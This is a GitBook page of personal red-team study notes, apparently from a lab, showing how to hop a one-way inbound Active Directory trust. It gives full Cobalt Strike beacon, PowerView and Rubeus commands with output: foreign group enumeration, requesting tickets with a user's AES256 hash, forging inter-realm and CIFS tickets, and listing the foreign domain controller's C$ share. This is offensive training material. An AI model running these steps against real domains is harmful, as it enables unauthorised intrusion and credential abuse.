What is this changing
Notes
NotesSome other stuff
test
Notes
NotesSome other stuff
  • Mixing...
  • General
    • Transferring Files
      • Serving Your Files
      • Transferring Files To Linux
      • Transferring Files To Windows
    • File Types
      • .vhd
    • Password Cracking
      • Hashcat
        • Wordlists
        • Wordlist + Rules
        • Masks
        • Mask Files
        • Combinator
        • Hybrid
        • Keyboard Walks
    • Trash to sift through
      • Cookie 3.1.24.ctd
  • OSINT
  • Enumeration
  • Web Applications
    • Web Vulnerabilities
      • Web App Red Team Checklist
      • SSRF (Server Side Request Forgery)
      • Blind Data Exfiltration via DNS
      • XSS
      • XXE
      • XPath Injection
    • APIs
      • Web API Indicators
      • Passive Reconnaissance
      • Active API Reconnaissance
  • Active Directory
    • Reconnaissance
      • PowerView
      • SharpView
      • ADSearch
    • User Impersonation
      • Pass the Hash
      • Pass the Ticket
      • Overpass the Hash
      • Token Impersonation
      • Token Store
      • Make Token
      • Process Injection
    • Lateral Movement
      • Windows Remote Management
      • PsExec
      • Windows Management Instrumentation (WMI)
      • CoInitializeSecurity
      • DCOM
    • Kerberos
      • Kerberoasting
      • ASREP Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Alternate Service Name
      • S4U2Self Abuse
      • Resource-Based Constrained Delegation
      • Shadow Credentials
      • Kerberos Relay Attacks
    • Pivoting
      • SOCKS Proxies
      • Linux Tools For Proxies
      • Windows Tools For Proxies
      • Pivoting with Kerberos
      • Pivoting A Browser
      • Reverse Port Forwards
      • NTLM Relaying
      • Relaying WebDAV
    • AD Certificate Services
      • Find Certificate Authorities
      • Misconfigured Certificate Templates
      • NTLM Relaying to ADCS HTTP Endpoints
      • User & Computer Persistence
    • Group Policy
      • Modify Existing GPO
      • Create & Link a GPO
    • MS SQL Servers
      • MS SQL Impersonation
      • MS SQL Command Execution
      • MS SQL Lateral Movement
      • MS SQL Privilege Escalation
    • Configuration Manager
      • Enumeration
      • Network Access Account Credentials
      • Lateral Movement
    • Domain Dominance
      • Silver Tickets
      • Golden Ticket
      • Diamond Tickets
      • Forged Certificates
    • Forest & Domain Trusts
      • Parent/Child
      • One-Way Inbound
      • One-Way Outbound
    • LAPS (Local Administrator Password Solution)
      • Reading ms-Mcs-AdmPwd
      • Password Expiration Protection
      • LAPS Backdoors
  • Report Writing
    • Wireless Pentesting
  • Cobalt Strike
    • Starting
      • Start CS as a Service
      • Listener Management
      • Generating Payloads
      • Pivot Listeners
    • Take Screenshot
    • Mimikatz
      • NTLM Hashes
      • Kerberos Encryption Keys
      • Security Account Manager
      • Domain Cached Credentials
    • Extracting Kerberos Tickets
    • DCSync
    • Session Passing
      • Beacon Passing
      • Foreign Listener
      • Spawn & Inject
    • Credentials
      • Credential Manager
      • Scheduled Task Credentials
    • Evading Windows Defender
      • Artifact Kit
      • Malleable C2
      • Resource Kit
      • AMSI vs Post-Exploitation
      • Manual AMSI Bypasses
      • Behavioural Detections
      • Parent/Child Relationships
      • Command Line Detections
    • Application Whitelisting
      • Policy Enumeration
      • Writeable Paths
      • Binaries, Scripts, and Libraries
      • PowerShell CLM
      • Beacon DLL
Powered by GitBook
On this page
Edit on GitHub

Last updated 4 days ago

dev.cyberbotic.io also has a one-way inbound trust with dev-studio.com.

Because the trust is inbound from our perspective, it means that principals in our domain can be granted access to resources in the foreign domain. We can enumerate the foreign domain across the trust.

Get-DomainForeignGroupMember will enumerate any groups that contain users outside of its domain and return its members.

This output shows that there's a member of the domain's built-in Administrators group who is not part of dev-studio.com. The MemberName field contains a SID that can be resolved in our current domain.

This means that members of DEV\Studio Admins are also members of the built-in Administrators group of dev-studio.com and therefore inherit local admin access to dc.dev-studio.com. If this is confusing, this is how it looks from the perspective of the foreign domain controller.

To hop this trust, we only need to impersonate a member of this Studio Admins domain group.

To hop a domain trust using Kerberos, we first need an inter-realm key. Obtain a TGT for the target user (here I am using asktgt with their AES256 hash).

Next, use that TGT to request a referral ticket from the current domain to the target domain.

Notice how this inter-realm ticket is of type rc4_hmac even though our TGT was aes256_cts_hmac_sha1. This is the default configuration unless AES has been specifically configured on the trust, so this is not necessarily bad OPSEC.

Finally, use this inter-realm ticket to request TGS's in the target domain. Here, I'm requesting a ticket for CIFS.

beacon> powershell Get-DomainTrust

SourceName      : dev.cyberbotic.io
TargetName      : dev-studio.com
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : 
TrustDirection  : Inbound
WhenCreated     : 8/16/2022 9:52:37 AM
WhenChanged     : 8/16/2022 9:52:37 AM
beacon> powershell Get-DomainComputer -Domain dev-studio.com -Properties DnsHostName

dnshostname      
-----------      
dc.dev-studio.com
beacon> powershell Get-DomainForeignGroupMember -Domain dev-studio.com

GroupDomain             : dev-studio.com
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=dev-studio,DC=com
MemberDomain            : dev-studio.com
MemberName              : S-1-5-21-569305411-121244042-2357301523-1120
MemberDistinguishedName : CN=S-1-5-21-569305411-121244042-2357301523-1120,CN=ForeignSecurityPrincipals,DC=dev-studio,DC=com
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1120

DEV\Studio Admins
beacon> powershell Get-DomainGroupMember -Identity "Studio Admins" | select MemberName

MemberName
----------
nlamb
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /aes256:a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4 /nowrap

[*] Action: Ask TGT

[*] Using aes256_cts_hmac_sha1 hash: a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4
[*] Building AS-REQ (w/ preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFwj[...]MuaW8=
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:krbtgt/dev-studio.com /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFwj[...]MuaW8= /nowrap

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'krbtgt/dev-studio.com'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[+] TGS request successful!
[*] base64(ticket.kirbi):

doIFoz[...]NPTQ==

ServiceName              :  krbtgt/DEV-STUDIO.COM
ServiceRealm             :  DEV.CYBERBOTIC.IO
UserName                 :  nlamb
UserRealm                :  DEV.CYBERBOTIC.IO
StartTime                :  9/12/2022 11:13:23 AM
EndTime                  :  9/12/2022 9:11:21 PM
RenewTill                :  9/19/2022 11:11:21 AM
Flags                    :  name_canonicalize, pre_authent, renewable, forwardable
KeyType                  :  rc4_hmac
Base64(key)              :  zfUbwA2B0+aqao7HSvnUgw==
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:cifs/dc.dev-studio.com /domain:dev-studio.com /dc:dc.dev-studio.com /ticket:doIFoz[...]NPTQ== /nowrap

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/dc.dev-studio.com'
[*] Using domain controller: dc.dev-studio.com (10.10.150.10)
[+] TGS request successful!
[*] base64(ticket.kirbi):

doIFkD[...]8uY29t

ServiceName              :  cifs/dc.dev-studio.com
ServiceRealm             :  DEV-STUDIO.COM
UserName                 :  nlamb
UserRealm                :  DEV.CYBERBOTIC.IO
StartTime                :  9/12/2022 11:16:46 AM
EndTime                  :  9/12/2022 9:11:21 PM
RenewTill                :  9/19/2022 11:11:21 AM
Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType                  :  aes256_cts_hmac_sha1
Base64(key)              :  V1vCRoRX/9SAFe/ynWQIE9E9DYztP0mk6bg9BRx9Wjk=
beacon> run klist

Current LogonId is 0:0x45bcb0

Cached Tickets: (1)

#0>	Client: nlamb @ DEV.CYBERBOTIC.IO
	Server: cifs/dc.dev-studio.com @ DEV-STUDIO.COM
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	
beacon> ls \\dc.dev-studio.com\c$

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/16/2022 09:15:48   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     05/08/2021 08:20:24   PerfLogs
          dir     08/19/2021 06:35:15   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     08/16/2022 09:26:24   ProgramData
          dir     08/16/2022 08:54:23   Recovery
          dir     08/16/2022 09:26:41   System Volume Information
          dir     08/16/2022 08:55:34   Users
          dir     08/16/2022 09:23:25   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     09/12/2022 08:36:05   DumpStack.log.tmp
 384mb    fil     09/12/2022 08:36:05   pagefile.sys
PreviousParent/ChildNextOne-Way Outbound
  1. Active Directory
  2. Forest & Domain Trusts

One-Way Inbound